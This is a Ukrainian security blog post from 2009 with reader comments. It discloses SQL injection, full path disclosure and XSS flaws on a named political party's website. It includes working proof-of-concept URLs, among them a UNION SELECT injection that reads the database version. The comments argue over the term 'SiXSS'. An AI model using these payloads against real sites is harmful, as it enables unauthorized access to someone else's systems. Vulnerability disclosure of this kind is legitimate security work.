Уразливості на prp.org.ua
19:28 26.06.200913.01.2009
У березні, 03.03.2008, я знайшов SQL Injection, Full path disclosure і Cross-Site Scripting уразливості на http://prp.org.ua - сайті політичної партії ПРП. Про що найближчим часом сповіщу адміністрацію сайта.
Зазначу, що ще 3 березня 2008 року я повідомив розробників сайта про наявність дірок на ньому і навів їм приклад XSS. Але ні XSS, ні жодна інша дірка на сайті так досі й не була виправлена. Що дуже несерйозно як для веб сайта політичної сили.
Детальна інформація про уразливості з’явиться пізніше.
26.06.2009
SQL Injection:
http://prp.org.ua/index.php?mid=-1%20union%20select%201,1,version(),1,1,1,1,1
XSS (через SQL Injection):
Full path disclosure:
http://prp.org.ua/index.php?mid=’
http://prp.org.ua/includes/stat.php
XSS:
Дані уразливості досі не виправлені.
П'ятниця, 22:36 26.06.2009
“XSS (через SQL Injection)”
така ксс (xss через sqlInj) називається SiXSS
П'ятниця, 23:26 26.06.2009
poma, спасибі за інформацію .
Але, по-перше, про таку назву я не чув. По-друге, так я не називаю дані XSS. По-третє, назва не милозвучна (і пишеться і читається не гарно), тому невдала назва .
А по-четверте, всі уразливості, які є атакою через інші уразливості, як в даному випадку, я називаю саме за таким шаблоном: уразливість (через уразливість). Щоб було видно яка уразливість є першопричиною для даної атаки.
Тобто: XSS (через SQL Injection), Redirector (через SQL Injection), HTTP Response Splitting (через SQL Injection), Full path disclosure (через SQL Injection) та багато інших випадків, про які я чимало писав в себе на сайті.
Субота, 16:21 27.06.2009
уразливість (через уразливість)
скорочення назв й придумані для того шоб скорочувати
Неділя, 23:59 16.08.2009
poma, в тому то і справа, що в секюріті галузі використовують абревіатури, і рідко коли скорочення (а абревіатури і скорочення - це різні речі). А в твоєму випадку це навіть не абревіатура і не скорочення, а казна що .
SiXSS - це вигадана абревіатура, бо на відміну від таких поширених абревіатур як XSS і SQLi, вона не є абревіатурою (за визначенням). Так що це є нісенітниця . Яка звучить як “сікс”, тобто шість по англійські, і жодним чином не вказує на те, що це XSS через SQL Injection (це більше схоже на те, що хтось помилився коли писав абревіатуру XSS).
XSS через SQL Injection (XSS over SQL Injection), можна скоротити до XSS через SQLi (XSS over SQLi), або навіть XoS (XoSI). Тоді це буде справжньою абревіатурою (за визначенням). Але без цього можна обійтися і спокійно використовувати повну (чи частково скорочену) назву, щоб не робити абревіатури з інших абревіатур.